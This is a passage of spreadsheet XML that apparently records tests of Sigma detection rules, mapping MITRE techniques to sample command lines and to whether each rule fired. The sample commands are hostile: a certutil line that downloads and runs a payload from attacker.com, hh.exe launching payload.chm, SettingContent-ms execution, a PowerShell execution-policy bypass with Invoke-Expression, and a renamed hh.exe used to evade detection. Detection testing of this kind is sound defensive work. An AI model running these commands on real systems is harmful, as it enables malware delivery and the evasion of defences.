      <c r="K154" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B155" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_installation_cli_param</t>
        </is>
      </c>
      <c r="C155" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Installation Execution</t>
        </is>
      </c>
      <c r="D155" s="9" t="inlineStr">
        <is>
          <t>75bfe6e6-cd8e-429e-91d3-03921e1d7962</t>
        </is>
      </c>
      <c r="E155" s="9" t="inlineStr">
        <is>
          <t>ScreenConnect.ClientSetup.exe -e=Access -y=Guest -p=1 -c=2 -k=3</t>
        </is>
      </c>
      <c r="F155" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G155" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H155" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I155" s="13" t="n"/>
      <c r="J155" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K155" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B156" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_installation_cli_param</t>
        </is>
      </c>
      <c r="C156" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Installation Execution</t>
        </is>
      </c>
      <c r="D156" s="9" t="inlineStr">
        <is>
          <t>75bfe6e6-cd8e-429e-91d3-03921e1d7962</t>
        </is>
      </c>
      <c r="E156" s="9" t="inlineStr">
        <is>
          <t>ScreenConnect.ClientSetup.exe "e=Access&amp;y=Guest&amp;p=1&amp;c=2&amp;k=3"</t>
        </is>
      </c>
      <c r="F156" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G156" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H156" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="13" t="n"/>
      <c r="J156" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K156" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B157" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_installation_cli_param</t>
        </is>
      </c>
      <c r="C157" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Installation Execution</t>
        </is>
      </c>
      <c r="D157" s="9" t="inlineStr">
        <is>
          <t>75bfe6e6-cd8e-429e-91d3-03921e1d7962</t>
        </is>
      </c>
      <c r="E157" s="9" t="inlineStr">
        <is>
          <t>ScreenConnect.ClientSetup.exe e=Access y=Guest p=1 c=2 k=3</t>
        </is>
      </c>
      <c r="F157" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G157" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H157" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="13" t="n"/>
      <c r="J157" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K157" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B158" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_teamviewer_incoming_connection</t>
        </is>
      </c>
      <c r="C158" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - Team Viewer Session Started On Windows Host</t>
        </is>
      </c>
      <c r="D158" s="9" t="inlineStr">
        <is>
          <t>ab70c354-d9ac-4e11-bbb6-ec8e3b153357</t>
        </is>
      </c>
      <c r="E158" s="9" t="inlineStr">
        <is>
          <t>TeamViewer_Desktop.exe --IPCport 5939 --Module 1</t>
        </is>
      </c>
      <c r="F158" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G158" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H158" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="13" t="n"/>
      <c r="J158" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K158" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B159" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_teamviewer_incoming_connection</t>
        </is>
      </c>
      <c r="C159" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - Team Viewer Session Started On Windows Host</t>
        </is>
      </c>
      <c r="D159" s="9" t="inlineStr">
        <is>
          <t>ab70c354-d9ac-4e11-bbb6-ec8e3b153357</t>
        </is>
      </c>
      <c r="E159" s="9" t="inlineStr">
        <is>
          <t>TeamViewer_Desktop.exe --IPCport 5939 --Module=1</t>
        </is>
      </c>
      <c r="F159" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G159" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H159" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="13" t="n"/>
      <c r="J159" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K159" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B160" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_teamviewer_incoming_connection</t>
        </is>
      </c>
      <c r="C160" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - Team Viewer Session Started On Windows Host</t>
        </is>
      </c>
      <c r="D160" s="9" t="inlineStr">
        <is>
          <t>ab70c354-d9ac-4e11-bbb6-ec8e3b153357</t>
        </is>
      </c>
      <c r="E160" s="9" t="inlineStr">
        <is>
          <t>TeamViewer_Desktop.exe --Module 1 --IPCport 5939</t>
        </is>
      </c>
      <c r="F160" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G160" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H160" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="13" t="n"/>
      <c r="J160" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K160" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B161" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_teamviewer_incoming_connection</t>
        </is>
      </c>
      <c r="C161" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - Team Viewer Session Started On Windows Host</t>
        </is>
      </c>
      <c r="D161" s="9" t="inlineStr">
        <is>
          <t>ab70c354-d9ac-4e11-bbb6-ec8e3b153357</t>
        </is>
      </c>
      <c r="E161" s="9" t="inlineStr">
        <is>
          <t>TeamViewer_Desktop.exe --IPCport=5939 --Module=1</t>
        </is>
      </c>
      <c r="F161" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G161" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H161" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I161" s="13" t="n"/>
      <c r="J161" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K161" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B162" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_teamviewer_incoming_connection</t>
        </is>
      </c>
      <c r="C162" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - Team Viewer Session Started On Windows Host</t>
        </is>
      </c>
      <c r="D162" s="9" t="inlineStr">
        <is>
          <t>ab70c354-d9ac-4e11-bbb6-ec8e3b153357</t>
        </is>
      </c>
      <c r="E162" s="9" t="inlineStr">
        <is>
          <t>TeamViewer_Desktop.exe --IPCport 5939 --Module 1 --</t>
        </is>
      </c>
      <c r="F162" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G162" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H162" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I162" s="13" t="n"/>
      <c r="J162" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K162" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="20" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B163" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_teamviewer_incoming_connection</t>
        </is>
      </c>
      <c r="C163" s="9" t="inlineStr">
        <is>
          <t>Remote Access Tool - Team Viewer Session Started On Windows Host</t>
        </is>
      </c>
      <c r="D163" s="9" t="inlineStr">
        <is>
          <t>ab70c354-d9ac-4e11-bbb6-ec8e3b153357</t>
        </is>
      </c>
      <c r="E163" s="9" t="inlineStr">
        <is>
          <t>TeamViewer_Desktop.exe --IPCport 5939 -Module 1</t>
        </is>
      </c>
      <c r="F163" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G163" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H163" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I163" s="13" t="n"/>
      <c r="J163" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K163" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="21" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B164" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C164" s="9" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D164" s="9" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E164" s="9" t="inlineStr">
        <is>
          <t>cmd.exe /c "set EXT=.SettingContent-ms &amp;&amp; copy mymalware%EXT% %TEMP%\temp.xml &amp;&amp; control.exe %TEMP%\temp.xml"</t>
        </is>
      </c>
      <c r="F164" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G164" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H164" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I164" s="13" t="n"/>
      <c r="J164" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K164" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="21" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B165" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C165" s="9" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D165" s="9" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E165" s="9" t="inlineStr">
        <is>
          <t>ren payload.txt payload.settingcontent-ms &amp;&amp; explorer.exe payload.settingcontent-ms</t>
        </is>
      </c>
      <c r="F165" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G165" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H165" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I165" s="13" t="n"/>
      <c r="J165" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K165" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="22" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B166" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C166" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D166" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E166" s="9" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm</t>
        </is>
      </c>
      <c r="F166" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G166" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H166" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I166" s="9" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J166" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K166" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="22" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B167" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C167" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D167" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E167" s="9" t="inlineStr">
        <is>
          <t>cmd.exe /c "hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm"</t>
        </is>
      </c>
      <c r="F167" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G167" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H167" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="9" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J167" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K167" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="22" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B168" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C168" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D168" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E168" s="9" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\..\payload.chm</t>
        </is>
      </c>
      <c r="F168" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G168" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H168" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="9" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J168" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K168" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="22" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B169" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C169" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D169" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E169" s="9" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm::/script.htm</t>
        </is>
      </c>
      <c r="F169" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G169" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H169" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="9" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J169" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K169" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="22" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B170" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C170" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D170" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E170" s="9" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm --</t>
        </is>
      </c>
      <c r="F170" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G170" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H170" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I170" s="9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70" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K170" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="22" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B171" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C171" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D171" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E171" s="9" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm"</t>
        </is>
      </c>
      <c r="F171" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G171" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H171" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I171" s="9" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J171" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K171" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="22" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B172" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C172" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D172" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E172" s="9" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm\</t>
        </is>
      </c>
      <c r="F172" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G172" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H172" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="9" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J172" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K172" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="22" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B173" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C173" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D173" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E173" s="9" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm::</t>
        </is>
      </c>
      <c r="F173" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G173" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H173" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I173" s="9" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J173" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K173" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="21" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B174" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C174" s="9" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D174" s="9" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E174" s="9" t="inlineStr">
        <is>
          <t>powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$p = 'C:\path\to\payload.settingcontent-ms'; $c = Get-Content $p -Raw; Invoke-Expression ($c.ToString().Replace('.SettingContent-ms', ''))"</t>
        </is>
      </c>
      <c r="F174" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G174" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H174" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="9" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); Arbitrary Shell Command Execution Via Settingcontent-Ms (24de4f3b-804c-4165-b442-5a06a2302c7e); Arbitrary Shell Command Execution Via Settingcontent-Ms (24de4f3b-804c-4165-b442-5a06a2302c7e)</t>
        </is>
      </c>
      <c r="J174" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K174" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="23" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B175" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C175" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D175" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E175" s="9" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F175" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G175" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H175" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I175" s="9" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J175" s="24" t="n"/>
      <c r="K175" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="23" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B176" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C176" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D176" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E176" s="9" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F176" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G176" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H176" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I176" s="9" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J176" s="24" t="n"/>
      <c r="K176" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="23" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B177" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C177" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D177" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E177" s="9" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F177" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G177" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H177" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I177" s="9" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J177" s="24" t="n"/>
      <c r="K177" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="25" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B178" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lnk_exec_hidden_cmd</t>
        </is>
      </c>
      <c r="C178" s="9" t="inlineStr">
        <is>
          <t>Suspicious LNK Command-Line Padding with Whitespace Characters</t>
        </is>
      </c>
      <c r="D178" s="9" t="inlineStr">
        <is>
          <t>dd8756e7-a3a0-4768-b47e-8f545d1a751c</t>
        </is>
      </c>
      <c r="E178" s="9" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "certutil.exe -urlcache -f http://attacker.com/payload.exe C:\temp\p.exe &amp;&amp; C:\temp\p.exe"</t>
        </is>
      </c>
      <c r="F178" s="10" t="b">
        <v>1</v>
      </c>
      <c r="G178" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H178" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I178" s="9" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J178" s="24" t="n"/>
      <c r="K178" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="25" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B179" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lnk_exec_hidden_cmd</t>
        </is>
      </c>
      <c r="C179" s="9" t="inlineStr">
        <is>
          <t>Suspicious LNK Command-Line Padding with Whitespace Characters</t>
        </is>
      </c>
      <c r="D179" s="9" t="inlineStr">
        <is>
          <t>dd8756e7-a3a0-4768-b47e-8f545d1a751c</t>
        </is>
      </c>
      <c r="E179" s="9" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "powershell.exe -Command Write-Host 'Malicious Payload Executed'"</t>
        </is>
      </c>
      <c r="F179" s="10" t="b">
        <v>0</v>
      </c>
      <c r="G179" s="11" t="b">
        <v>0</v>
      </c>
      <c r="H179" s="12" t="b">
        <v>0</v>
      </c>
      <c r="I179" s="13" t="n"/>
      <c r="J179" s="24" t="n"/>
      <c r="K179" s="12" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="23" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B180" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C180" s="9" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D180" s="9" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E180" s="9" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F180" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G180" s="17" t="b">
